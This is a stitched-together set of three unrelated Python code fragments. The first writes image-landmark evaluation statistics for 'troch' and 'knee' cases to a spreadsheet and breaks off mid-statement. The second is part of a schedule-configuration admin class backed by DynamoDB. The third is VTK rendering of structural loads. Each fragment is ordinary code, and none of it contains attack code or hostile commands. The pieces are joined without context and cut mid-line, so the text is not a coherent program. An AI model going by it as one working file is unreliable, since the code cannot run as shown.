troch_sheet.write(troch_row,3,troch_dices_min)
troch_sheet.write(troch_row,4,troch_overlaps_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max all troch img params")
troch_sheet.write(troch_row,1,troch_dist_errors_max)
troch_sheet.write(troch_row,2,troch_total_rewards_max)
troch_sheet.write(troch_row,3,troch_dices_max)
troch_sheet.write(troch_row,4,troch_overlaps_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median all troch img params")
troch_sheet.write(troch_row,1,troch_dist_errors_med)
troch_sheet.write(troch_row,2,troch_total_rewards_med)
troch_sheet.write(troch_row,3,troch_dices_med)
troch_sheet.write(troch_row,4,troch_overlaps_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean all troch img params")
troch_sheet.write(troch_row,1,troch_dist_errors_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_mean)
troch_sheet.write(troch_row,3,troch_dices_mean)
troch_sheet.write(troch_row,4,troch_overlaps_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev all trochimg params")
troch_sheet.write(troch_row,1,troch_dist_errors_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_stdev)
troch_sheet.write(troch_row,3,troch_dices_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min in")
troch_sheet.write(troch_row,1,troch_dist_errors_in_min)
troch_sheet.write(troch_row,2,troch_total_rewards_in_min)
troch_sheet.write(troch_row,3,troch_dices_in_min)
troch_sheet.write(troch_row,4,troch_overlaps_in_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max in")
troch_sheet.write(troch_row,1,troch_dist_errors_in_max)
troch_sheet.write(troch_row,2,troch_total_rewards_in_max)
troch_sheet.write(troch_row,3,troch_dices_in_max)
troch_sheet.write(troch_row,4,troch_overlaps_in_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median in")
troch_sheet.write(troch_row,1,troch_dist_errors_in_med)
troch_sheet.write(troch_row,2,troch_total_rewards_in_med)
troch_sheet.write(troch_row,3,troch_dices_in_med)
troch_sheet.write(troch_row,4,troch_overlaps_in_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean in")
troch_sheet.write(troch_row,1,troch_dist_errors_in_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_in_mean)
troch_sheet.write(troch_row,3,troch_dices_in_mean)
troch_sheet.write(troch_row,4,troch_overlaps_in_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev in")
troch_sheet.write(troch_row,1,troch_dist_errors_in_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_in_stdev)
troch_sheet.write(troch_row,3,troch_dices_in_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_in_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min opp")
troch_sheet.write(troch_row,1,troch_dist_errors_opp_min)
troch_sheet.write(troch_row,2,troch_total_rewards_opp_min)
troch_sheet.write(troch_row,3,troch_dices_opp_min)
troch_sheet.write(troch_row,4,troch_overlaps_opp_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max opp")
troch_sheet.write(troch_row,1,troch_dist_errors_opp_max)
troch_sheet.write(troch_row,2,troch_total_rewards_opp_max)
troch_sheet.write(troch_row,3,troch_dices_opp_max)
troch_sheet.write(troch_row,4,troch_overlaps_opp_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median opp")
troch_sheet.write(troch_row,1,troch_dist_errors_opp_med)
troch_sheet.write(troch_row,2,troch_total_rewards_opp_med)
troch_sheet.write(troch_row,3,troch_dices_opp_med)
troch_sheet.write(troch_row,4,troch_overlaps_opp_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean opp")
troch_sheet.write(troch_row,1,troch_dist_errors_opp_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_opp_mean)
troch_sheet.write(troch_row,3,troch_dices_opp_mean)
troch_sheet.write(troch_row,4,troch_overlaps_opp_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev opp")
troch_sheet.write(troch_row,1,troch_dist_errors_opp_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_opp_stdev)
troch_sheet.write(troch_row,3,troch_dices_opp_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_opp_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min F")
troch_sheet.write(troch_row,1,troch_dist_errors_F_min)
troch_sheet.write(troch_row,2,troch_total_rewards_F_min)
troch_sheet.write(troch_row,3,troch_dices_F_min)
troch_sheet.write(troch_row,4,troch_overlaps_F_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max F")
troch_sheet.write(troch_row,1,troch_dist_errors_F_max)
troch_sheet.write(troch_row,2,troch_total_rewards_F_max)
troch_sheet.write(troch_row,3,troch_dices_F_max)
troch_sheet.write(troch_row,4,troch_overlaps_F_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median F")
troch_sheet.write(troch_row,1,troch_dist_errors_F_med)
troch_sheet.write(troch_row,2,troch_total_rewards_F_med)
troch_sheet.write(troch_row,3,troch_dices_F_med)
troch_sheet.write(troch_row,4,troch_overlaps_F_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean F")
troch_sheet.write(troch_row,1,troch_dist_errors_F_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_F_mean)
troch_sheet.write(troch_row,3,troch_dices_F_mean)
troch_sheet.write(troch_row,4,troch_overlaps_F_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev F")
troch_sheet.write(troch_row,1,troch_dist_errors_F_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_F_stdev)
troch_sheet.write(troch_row,3,troch_dices_F_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_F_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min W")
troch_sheet.write(troch_row,1,troch_dist_errors_W_min)
troch_sheet.write(troch_row,2,troch_total_rewards_W_min)
troch_sheet.write(troch_row,3,troch_dices_W_min)
troch_sheet.write(troch_row,4,troch_overlaps_W_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max W")
troch_sheet.write(troch_row,1,troch_dist_errors_W_max)
troch_sheet.write(troch_row,2,troch_total_rewards_W_max)
troch_sheet.write(troch_row,3,troch_dices_W_max)
troch_sheet.write(troch_row,4,troch_overlaps_W_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median W")
troch_sheet.write(troch_row,1,troch_dist_errors_W_med)
troch_sheet.write(troch_row,2,troch_total_rewards_W_med)
troch_sheet.write(troch_row,3,troch_dices_W_med)
troch_sheet.write(troch_row,4,troch_overlaps_W_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean W")
troch_sheet.write(troch_row,1,troch_dist_errors_W_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_W_mean)
troch_sheet.write(troch_row,3,troch_dices_W_mean)
troch_sheet.write(troch_row,4,troch_overlaps_W_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev W")
troch_sheet.write(troch_row,1,troch_dist_errors_W_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_W_stdev)
troch_sheet.write(troch_row,3,troch_dices_W_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_W_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min T1 non fs")
troch_sheet.write(troch_row,1,troch_dist_errors_T1_min)
troch_sheet.write(troch_row,2,troch_total_rewards_T1_min)
troch_sheet.write(troch_row,3,troch_dices_T1_min)
troch_sheet.write(troch_row,4,troch_overlaps_T1_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max T1 non fs")
troch_sheet.write(troch_row,1,troch_dist_errors_T1_max)
troch_sheet.write(troch_row,2,troch_total_rewards_T1_max)
troch_sheet.write(troch_row,3,troch_dices_T1_max)
troch_sheet.write(troch_row,4,troch_overlaps_T1_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median T1 non fs")
troch_sheet.write(troch_row,1,troch_dist_errors_T1_med)
troch_sheet.write(troch_row,2,troch_total_rewards_T1_med)
troch_sheet.write(troch_row,3,troch_dices_T1_med)
troch_sheet.write(troch_row,4,troch_overlaps_T1_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean T1 non fs")
troch_sheet.write(troch_row,1,troch_dist_errors_T1_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_T1_mean)
troch_sheet.write(troch_row,3,troch_dices_T1_mean)
troch_sheet.write(troch_row,4,troch_overlaps_T1_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev T1 non fs")
troch_sheet.write(troch_row,1,troch_dist_errors_T1_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_T1_stdev)
troch_sheet.write(troch_row,3,troch_dices_T1_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_T1_stdev)
troch_row += 1
troch_sheet.write(troch_row,0,"min T2 haste tirm")
troch_sheet.write(troch_row,1,troch_dist_errors_T2_min)
troch_sheet.write(troch_row,2,troch_total_rewards_T2_min)
troch_sheet.write(troch_row,3,troch_dices_T2_min)
troch_sheet.write(troch_row,4,troch_overlaps_T2_min)
troch_row += 1
troch_sheet.write(troch_row,0,"max T2 haste tirm")
troch_sheet.write(troch_row,1,troch_dist_errors_T2_max)
troch_sheet.write(troch_row,2,troch_total_rewards_T2_max)
troch_sheet.write(troch_row,3,troch_dices_T2_max)
troch_sheet.write(troch_row,4,troch_overlaps_T2_max)
troch_row += 1
troch_sheet.write(troch_row,0,"median T2 haste tirm")
troch_sheet.write(troch_row,1,troch_dist_errors_T2_med)
troch_sheet.write(troch_row,2,troch_total_rewards_T2_med)
troch_sheet.write(troch_row,3,troch_dices_T2_med)
troch_sheet.write(troch_row,4,troch_overlaps_T2_med)
troch_row += 1
troch_sheet.write(troch_row,0,"mean T2 haste tirm")
troch_sheet.write(troch_row,1,troch_dist_errors_T2_mean)
troch_sheet.write(troch_row,2,troch_total_rewards_T2_mean)
troch_sheet.write(troch_row,3,troch_dices_T2_mean)
troch_sheet.write(troch_row,4,troch_overlaps_T2_mean)
troch_row += 1
troch_sheet.write(troch_row,0,"stdev T2 haste tirm")
troch_sheet.write(troch_row,1,troch_dist_errors_T2_stdev)
troch_sheet.write(troch_row,2,troch_total_rewards_T2_stdev)
troch_sheet.write(troch_row,3,troch_dices_T2_stdev)
troch_sheet.write(troch_row,4,troch_overlaps_T2_stdev)
troch_row += 1
################## knee ###################
knee_dist_errors_min = min(knee_dist_errors)
knee_total_rewards_min = min(knee_total_rewards)
knee_dices_min = min(knee_dices)
knee_overlaps_min = min(knee_overlaps)
knee_dist_errors_max = max(knee_dist_errors)
knee_total_rewards_max = max(knee_total_rewards)
knee_dices_max = max(knee_dices)
knee_overlaps_max = max(knee_overlaps)
knee_dist_errors_med = statistics.median(knee_dist_errors)
knee_total_rewards_med = statistics.median(knee_total_rewards)
knee_dices_med = statistics.median(knee_dices)
knee_overlaps_med = statistics.median(knee_overlaps)
knee_dist_errors_mean = statistics.mean(knee_dist_errors)
knee_total_rewards_mean = statistics.mean(knee_total_rewards)
knee_dices_mean = statistics.mean(knee_dices)
knee_overlaps_mean = statistics.mean(knee_overlaps)
knee_dist_errors_stdev = statistics.stdev(knee_dist_errors)
knee_total_rewards_stdev = statistics.stdev(knee_total_rewards)
knee_dices_stdev = statistics.stdev(knee_dices)
knee_overlaps_stdev = statistics.stdev(knee_overlaps)
knee_dist_errors_in_min = min(knee_dist_errors_in)
knee_total_rewards_in_min = min(knee_total_rewards_in)
knee_dices_in_min = min(knee_dices_in)
knee_overlaps_in_min = min(knee_overlaps_in)
knee_dist_errors_in_max = max(knee_dist_errors_in)
knee_total_rewards_in_max = max(knee_total_rewards_in)
knee_dices_in_max = max(knee_dices_in)
knee_overlaps_in_max = max(knee_overlaps_in)
knee_dist_errors_in_med = statistics.median(knee_dist_errors_in)
knee_total_rewards_in_med = statistics.median(knee_total_rewards_in)
knee_dices_in_med = statistics.median(knee_dices_in)
knee_overlaps_in_med = statistics.median(knee_overlaps_in)
knee_dist_errors_in_mean = statistics.mean(knee_dist_errors_in)
knee_total_rewards_in_mean = statistics.mean(knee_total_rewards_in)
knee_dices_in_mean = statistics.mean(knee_dices_in)
knee_overlaps_in_mean = statistics.mean(knee_overlaps_in)
knee_dist_errors_in_stdev = statistics.stdev(knee_dist_errors_in)
knee_total_rewards_in_stdev = statistics.stdev(knee_total_rewards_in)
knee_dices_in_stdev = statistics.stdev(knee_dices_in)
knee_overlaps_in_stdev = statistics.stdev(knee_overlaps_in)
knee_dist_errors_opp_min = min(knee_dist_errors_opp)
knee_total_rewards_opp_min = min(knee_total_rewards_opp)
knee_dices_opp_min = min(knee_dices_opp)
knee_overlaps_opp_min = min(knee_overlaps_opp)
knee_dist_errors_opp_max = max(knee_dist_errors_opp)
knee_total_rewards_opp_max = max(knee_total_rewards_opp)
knee_dices_opp_max = max(knee_dices_opp)
knee_overlaps_opp_max = max(knee_overlaps_opp)
knee_dist_errors_opp_med = statistics.median(knee_dist_errors_opp)
knee_total_rewards_opp_med = statistics.median(knee_total_rewards_opp)
knee_dices_opp_med = statistics.median(knee_dices_opp)
knee_overlaps_opp_med = statistics.median(knee_overlaps_opp)
knee_dist_errors_opp_mean = statistics.mean(knee_dist_errors_opp)
knee_total_rewards_opp_mean = statistics.mean(knee_total_rewards_opp)
knee_dices_opp_mean = statistics.mean(knee_dices_opp)
knee_overlaps_opp_mean = statistics.mean(knee_overlaps_opp)
knee_dist_errors_opp_stdev = statistics.stdev(knee_dist_errors_opp)
knee_total_rewards_opp_stdev = statistics.stdev(knee_total_rewards_opp)
knee_dices_opp_stdev = statistics.stdev(knee_dices_opp)
knee_overlaps_opp_stdev | |
or len(name) == 0:
raise ValueError(ERR_GET_SCHEDULE_NAME_EMPTY)
schedule = self._get_schedule(name)
if schedule is None:
if exception_if_not_exists:
raise ValueError(ERR_GET_SCHEDULE_NOT_FOUND.format(name))
return None
return {"schedule": ConfigAdmin._for_output(schedule)}
def create_schedule(self, **kwargs):
"""
Creates a new schedule
:param kwargs: schedule data, see validate_schedule for allowed parameters
:return: Validated data of created schedule
"""
schedule = self._validate_schedule(**kwargs)
name = schedule[configuration.NAME]
if self._get_schedule(name) is not None:
raise ValueError(ERR_CREATE_SCHEDULE_EXISTS.format(name))
self._table.put_item_with_retries(Item=schedule)
return {"schedule": ConfigAdmin._for_output(schedule)}
def update_schedule(self, **kwargs):
"""
Updates an existing schedule
:param kwargs: schedule data, see validate_schedule for allowed parameters
:return: Validated updated schedule
"""
schedule = self._validate_schedule(**kwargs)
name = schedule[configuration.NAME]
if name is None or len(name) == 0:
raise ValueError(ERR_UPDATE_SCHEDULE_NAME_EMPTY)
if self._get_schedule(name) is None:
raise ValueError(ERR_UPDATE_SCHEDULE_NOT_FOUND.format(name))
self._table.put_item_with_retries(Item=schedule)
return {"schedule": ConfigAdmin._for_output(schedule)}
def delete_schedule(self, name, exception_if_not_exists=True):
"""
Deletes a schedule
:param name: name of the schedule
:param exception_if_not_exists: True if an exception should be raised if the schedule does not exists
:return: Deleted schedule, None if it did not exist
"""
if name is None or len(name) == 0:
raise ValueError(ERR_DEL_SCHEDULE_NAME_EMPTY)
if self._get_schedule(name) is None:
if exception_if_not_exists:
raise ValueError(ERR_DEL_SCHEDULE_NOT_FOUND.format(name))
return None
self._table.delete_item_with_retries(Key={"name": name, "type": "schedule"})
return {"schedule": name}
def get_schedule_usage(self, name, startdate=None, enddate=None):
"""
Get running periods for a schedule in a period
:param name: name of the schedule
:param startdate: start date of the period, None is today
:param enddate: end date of the period, None is today
:return: dictionary containing the periods in the specified in which instances are running as well as the % saving
in running hours
"""
if name is None or len(name) == 0:
raise ValueError(ERR_GET_USAGE_SCHEDULE_NAME_EMPTY)
if startdate:
if not isinstance(startdate, datetime):
try:
start = datetime.strptime(startdate, "%Y%m%d")
except ValueError as ex:
raise ValueError(
ERR_GET_USAGE_INVALID_START_DATE.format(startdate, str(ex)))
else:
start = startdate
else:
start = startdate or datetime.now()
if enddate:
if not isinstance(enddate, datetime):
try:
end = datetime.strptime(enddate, "%Y%m%d")
except ValueError as ex:
raise ValueError(
ERR_GET_USAGE_INVALID_END_DATE.format(enddate, str(ex)))
else:
end = enddate
else:
end = start
if start > end:
raise ValueError(ERR_GET_USAGE_START_MUST_BE_LESS_OR_EQUAL_STOP)
schedule = self.configuration.get_schedule(name)
if schedule is None:
raise ValueError(ERR_GET_USAGE_SCHEDULE_NOT_FOUND.format(name))
periods = self.calculate_schedule_usage_for_period(name, start_dt=start, stop_dt=end)
# to json and back again using custom encoder to convert datetimes
return ConfigAdmin._for_output(periods)
@staticmethod
def _for_output(item):
# to anf from json using custom encoder to convert datetime and set type data into string and lists
return json.loads(json.dumps(item, cls=ConfigAdmin.CustomEncoder))
@staticmethod
def _ensure_set(s):
if isinstance(s, list):
return set(s)
if isinstance(s, str):
return set(s.split(","))
return s
@staticmethod
def _set_as_list(s):
if isinstance(s, set):
return list(s)
return s
@staticmethod
def _ensure_bool(b):
s = str(b).lower()
if s == "true":
return True
if s == "false":
return False
return None
def _validate_period(self, **period):
result = {}
def is_valid_time(s):
return re.match(ConfigAdmin.TIME_REGEX, s) is not None
# allowed and validated parameters
valid_parameters = [configuration.BEGINTIME,
configuration.ENDTIME,
configuration.WEEKDAYS,
configuration.MONTHDAYS,
configuration.MONTHS,
configuration.NAME,
configuration.DESCRIPTION]
for attr in period:
# indicates type for config entry
if attr == ConfigAdmin.TYPE_ATTR:
continue
# parameter is allowed?
if attr not in valid_parameters:
raise ValueError(ERR_PERIOD_UNKNOWN_PARAMETER.format(attr, str(valid_parameters)))
# remove None values
if period[attr] is None or len(str(period[attr])) == 0:
continue
# period name
if attr == configuration.NAME:
result[attr] = period[attr]
continue
# description
if attr == configuration.DESCRIPTION:
result[attr] = period[attr]
continue
# validate start and end types times
if attr in [configuration.BEGINTIME, configuration.ENDTIME]:
time_str = period[attr]
if not is_valid_time(time_str):
raise ValueError(ERR_PERIOD_INVALID_TIME.format(attr, time_str))
result[attr] = str(datetime.strptime(time_str, configuration.TIME_FORMAT_STRING).time())[
0:len(configuration.TIME_FORMAT_STRING)]
if configuration.BEGINTIME in result and configuration.ENDTIME in result:
begintime = datetime.strptime(result[configuration.BEGINTIME], configuration.TIME_FORMAT_STRING).time()
endtime = datetime.strptime(result[configuration.ENDTIME], configuration.TIME_FORMAT_STRING).time()
if begintime > endtime:
raise ValueError(
ERR_PERIOD_BEGIN_LATER_THAN_END.format(result[configuration.BEGINTIME], result[configuration.ENDTIME]))
continue
# check weekdays, monthdays and month sets
if attr in [configuration.WEEKDAYS, configuration.MONTHDAYS, configuration.MONTHS]:
temp = self._ensure_set(period[attr])
if len(temp) == 0:
continue
# validate month
if attr == configuration.MONTHS:
# noinspection PyPep8
try:
MonthSetBuilder().build(temp)
result[attr] = temp
continue
except:
raise ValueError(ERR_PERIOD_INVALID_MONTHS.format(str(period[attr])))
# validate weekdays
if attr == configuration.WEEKDAYS:
try:
wdb = WeekdaySetBuilder(year=2016, month=12, day=31)
wdb.build(temp)
result[attr] = temp
continue
except Exception as ex:
raise ValueError(ERR_PERIOD_INVALID_WEEKDAYS.format(str(period[attr]), ex))
# validate monthdays
if attr == configuration.MONTHDAYS:
# noinspection PyPep8
try:
MonthdaySetBuilder(year=2016, month=12).build(temp)
result[attr] = temp
continue
except:
raise ValueError(ERR_PERIOD_INVALID_MONTHDAYS.format(str(period[attr])))
if configuration.NAME not in result:
raise ValueError(ERR_NAME_PARAM_MISSING)
for condition in [configuration.BEGINTIME,
configuration.ENDTIME,
configuration.WEEKDAYS,
configuration.MONTHS,
configuration.MONTHDAYS]:
if condition in result:
break
else:
raise ValueError(ERR_NO_PERIODS)
result[ConfigAdmin.TYPE_ATTR] = configuration.PERIOD
return result
# check schedule before writing it to the database
def _validate_schedule(self, **schedule):
result = {}
# allowed parameters
valid_parameters = [configuration.TIMEZONE,
configuration.PERIODS,
configuration.NAME,
configuration.DESCRIPTION,
configuration.OVERWRITE,
configuration.METRICS,
configuration.STOP_NEW_INSTANCES,
configuration.USE_MAINTENANCE_WINDOW,
configuration.SSM_MAINTENANCE_WINDOW,
configuration.RETAINED_RUNNING,
configuration.ENFORCED,
configuration.HIBERNATE,
configuration.OVERRIDE_STATUS,
configuration.SCHEDULE_CONFIG_STACK]
for attr in schedule:
if attr == ConfigAdmin.TYPE_ATTR:
continue
if attr not in valid_parameters:
raise ValueError(ERR_SCHEDULE_UNKNOWN_PARAMETER.format(attr, valid_parameters))
# skip None values
if schedule[attr] is None or len(str(schedule[attr])) == 0:
continue
# check periods set
if attr == configuration.PERIODS:
temp = self._ensure_set(schedule[attr])
if len(temp) > 0:
result[attr] = temp
continue
if attr in [configuration.NAME, configuration.SSM_MAINTENANCE_WINDOW]:
result[attr] = schedule[attr]
continue
# make sure these fields are valid booleans
if attr in [configuration.METRICS,
configuration.STOP_NEW_INSTANCES,
configuration.USE_MAINTENANCE_WINDOW,
configuration.RETAINED_RUNNING,
configuration.HIBERNATE,
configuration.ENFORCED]:
bool_value = self._ensure_bool(schedule[attr])
if bool_value is None:
raise ValueError(ERR_SCHEDULE_INVALID_BOOLEAN.format(schedule[attr], attr))
result[attr] = bool_value
continue
# overwrite status, now deprecated, use PROP_OVERRIDE_STATUS instead
if attr == configuration.OVERWRITE:
if configuration.OVERRIDE_STATUS in schedule:
raise ValueError(
ERR_SCHEDULE_OVERWRITE_OVERRIDE_EXCLUSIVE.format(configuration.OVERWRITE, configuration.OVERRIDE_STATUS))
bool_value = self._ensure_bool(schedule[attr])
if bool_value is None:
raise ValueError(ERR_SCHEDULE_INVALID_BOOLEAN.format(schedule[attr], attr))
result[
configuration.OVERRIDE_STATUS] = configuration.OVERRIDE_STATUS_RUNNING if bool_value \
else configuration.OVERRIDE_STATUS_STOPPED
continue
if attr == configuration.OVERRIDE_STATUS:
if configuration.OVERWRITE in schedule:
raise ValueError(
ERR_SCHEDULE_OVERWRITE_OVERRIDE_EXCLUSIVE.format(configuration.OVERWRITE, configuration.OVERRIDE_STATUS))
if schedule[attr] not in configuration.OVERRIDE_STATUS_VALUES:
raise ValueError(
ERR_SCHEDULE_INVALID_OVERRIDE.format(schedule[attr], attr, ",".join(configuration.OVERRIDE_STATUS_VALUES)))
result[attr] = schedule[attr]
continue
# description
if attr in [configuration.DESCRIPTION, configuration.SCHEDULE_CONFIG_STACK]:
result[attr] = schedule[attr]
continue
# validate timezone
if attr == configuration.TIMEZONE:
timezone = schedule[configuration.TIMEZONE]
if not SchedulerConfigBuilder.is_valid_timezone(timezone):
raise ValueError(
ERR_SCHEDULE_INVALID_TIMEZONE.format(timezone, configuration.TIMEZONE))
result[attr] = timezone
# name is mandatory
if configuration.NAME not in result:
raise ValueError(ERR_SCHEDULE_NAME_MISSING)
# if there is no overwrite there must be at least one period
if configuration.OVERRIDE_STATUS not in schedule:
if configuration.PERIODS not in schedule or len(schedule[configuration.PERIODS]) == 0:
raise ValueError(ERR_SCHEDULE_NO_PERIOD)
# validate if periods are in configuration
if configuration.PERIODS in result:
# get list of all configured periods
periods = [p[configuration.NAME] for p in self._list_periods()]
for period in result[configuration.PERIODS]:
if period.split(configuration.INSTANCE_TYPE_SEP)[0] not in periods:
raise ValueError(ERR_SCHEDULE_PERIOD_DOES_NOT_EXISTS.format(period))
# indicates this s a schedule
result[ConfigAdmin.TYPE_ATTR] = "schedule"
return result
def _items_of_type(self, config_type):
result = []
args = {
"FilterExpression": Key("type").eq(config_type),
"ConsistentRead": True
}
while True:
resp = self._table.scan_with_retries(**args)
result += resp.get("Items", [])
if "LastEvaluatedKey" in resp:
args["ExclusiveStartKey"] = resp["LastEvaluatedKey"]
else:
break
return result
def _list_schedules(self):
return self._items_of_type("schedule")
def _list_periods(self):
return self._items_of_type("period")
def _get_schedule(self, schedule_name):
resp = self._table.get_item_with_retries(Key={"name": schedule_name, "type": "schedule"}, ConsistentRead=True)
return resp.get("Item", None)
def _get_period(self, period_name):
resp = self._table.get_item_with_retries(Key={"name": period_name, "type": "period"}, ConsistentRead=True)
return resp.get("Item", None)
def calculate_schedule_usage_for_period(self, schedule_name, start_dt, stop_dt=None, logger=None):
result = {}
def running_seconds(startdt, stopdt):
return max(int((stopdt - startdt).total_seconds()), 60)
def running_hours(startdt, stopdt):
return int(((stopdt - startdt).total_seconds() - 1) / 3600) + 1
def make_period(started_dt, stopped_dt):
running_period = ({
"begin": started_dt,
"end": stopped_dt,
"billing_hours": running_hours(started_dt, stopped_dt),
"billing_seconds": running_seconds(started_dt, stopped_dt)
})
return running_period
self._logger = logger
stop = stop_dt or start_dt
if start_dt > stop:
raise ValueError(ERR_STOP_MUST_BE_LATER_OR_EQUAL_TO_START)
dt = start_dt if isinstance(start_dt, datetime) else datetime(start_dt.year, start_dt.month, start_dt.day)
config_data = ConfigDynamodbAdapter(self._table.name).config
while dt <= stop:
self._configuration = SchedulerConfigBuilder(logger=self._logger).build(config_data)
conf = configuration.SchedulerConfigBuilder(self._logger).build(config=config_data, dt=dt)
schedule = conf.get_schedule(schedule_name)
timeline = {dt.replace(hour=0, minute=0)}
for p in schedule.periods:
begintime = p["period"].begintime
endtime = p["period"].endtime
if begintime is None and endtime is None:
timeline.add(dt.replace(hour=0, minute=0))
timeline.add(dt.replace(hour=23, minute=59))
else:
if begintime:
timeline.add(dt.replace(hour=begintime.hour, minute=begintime.minute))
if endtime:
timeline.add(dt.replace(hour=endtime.hour, minute=endtime.minute))
running_periods = {}
started = None
starting_period = None
current_state = None
inst = as_namedtuple("Instance", {"instance_str": "instance", "allow_resize": False})
for tm in sorted(list(timeline)):
desired_state, instance_type, period = schedule.get_desired_state(inst, self._logger, tm, False)
if current_state != desired_state:
if desired_state == InstanceSchedule.STATE_RUNNING:
started = tm
current_state = InstanceSchedule.STATE_RUNNING
starting_period = period
elif desired_state == InstanceSchedule.STATE_STOPPED:
stopped = tm
desired_state_with_adj_check, _, __ = schedule.get_desired_state(inst, self._logger, tm, True)
if desired_state_with_adj_check == InstanceSchedule.STATE_RUNNING:
stopped += timedelta(minutes=1)
if current_state == InstanceSchedule.STATE_RUNNING:
current_state = InstanceSchedule.STATE_STOPPED
running_periods[starting_period] = (make_period(started, stopped))
if current_state == InstanceSchedule.STATE_RUNNING:
stopped = dt.replace(hour=23, minute=59) + timedelta(minutes=1)
running_periods[starting_period] = (make_period(started, stopped))
result[str(dt.date())] = {
"running_periods": running_periods,
"billing_seconds": sum([running_periods[ps]["billing_seconds"] for ps in running_periods]),
"billing_hours": sum([running_periods[ph]["billing_hours"] for ph in running_periods])
}
dt += timedelta(days=1)
| |
[1, 0, 0], load_value/max_pt_load*5*text_height, '{:.3g}'.format(load_value), text_height)
elif load[0] == 'FY':
ptLoad = VisPtLoad(position, [0, 1, 0], load_value/max_pt_load*5*text_height, '{:.3g}'.format(load_value), text_height)
elif load[0] == 'FZ':
ptLoad = VisPtLoad(position, [0, 0, 1], load_value/max_pt_load*5*text_height, '{:.3g}'.format(load_value), text_height)
elif load[0] == 'MX':
ptLoad = VisMoment(position, [1*sign, 0, 0], abs(load_value)/max_moment*2.5*text_height, '{:.3g}'.format(load_value), text_height)
elif load[0] == 'MY':
ptLoad = VisMoment(position, [0, 1*sign, 0], abs(load_value)/max_moment*2.5*text_height, '{:.3g}'.format(load_value), text_height)
elif load[0] == 'MZ':
ptLoad = VisMoment(position, [0, 0, 1*sign], abs(load_value)/max_moment*2.5*text_height, '{:.3g}'.format(load_value), text_height)
polydata.AddInputData(ptLoad.polydata.GetOutput())
renderer.AddActor(ptLoad.lblActor)
ptLoad.lblActor.SetCamera(renderer.GetActiveCamera())
# Step through each member distributed load
for load in member.DistLoads:
# Determine if this load is part of the requested load combination
if load[5] in load_factors:
# Calculate the factored value for this load and it's sign (positive or negative)
w1 = load[1]*load_factors[load[5]]
w2 = load[2]*load_factors[load[5]]
sign1 = w1/abs(w1)
sign2 = w2/abs(w2)
# Calculate the loads location in 3D space
x1 = load[3]
x2 = load[4]
position1 = [x_start + dir_cos[0, 0]*x1, y_start + dir_cos[0, 1]*x1, z_start + dir_cos[0, 2]*x1]
position2 = [x_start + dir_cos[0, 0]*x2, y_start + dir_cos[0, 1]*x2, z_start + dir_cos[0, 2]*x2]
# Display the load
if load[0] == 'Fx':
distLoad = VisDistLoad(position1, position2, dir_cos[0, :], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
elif load[0] == 'Fy':
distLoad = VisDistLoad(position1, position2, dir_cos[1, :], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
elif load[0] == 'Fz':
distLoad = VisDistLoad(position1, position2, dir_cos[2, :], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
elif load[0] == 'FX':
distLoad = VisDistLoad(position1, position2, [1, 0, 0], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
elif load[0] == 'FY':
distLoad = VisDistLoad(position1, position2, [0, 1, 0], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
elif load[0] == 'FZ':
distLoad = VisDistLoad(position1, position2, [0, 0, 1], w1/max_dist_load*5*text_height, w2/max_dist_load*5*text_height, '{:.3g}'.format(w1), '{:.3g}'.format(w2), text_height)
polydata.AddInputData(distLoad.polydata.GetOutput())
renderer.AddActor(distLoad.lblActors[0])
renderer.AddActor(distLoad.lblActors[1])
distLoad.lblActors[0].SetCamera(renderer.GetActiveCamera())
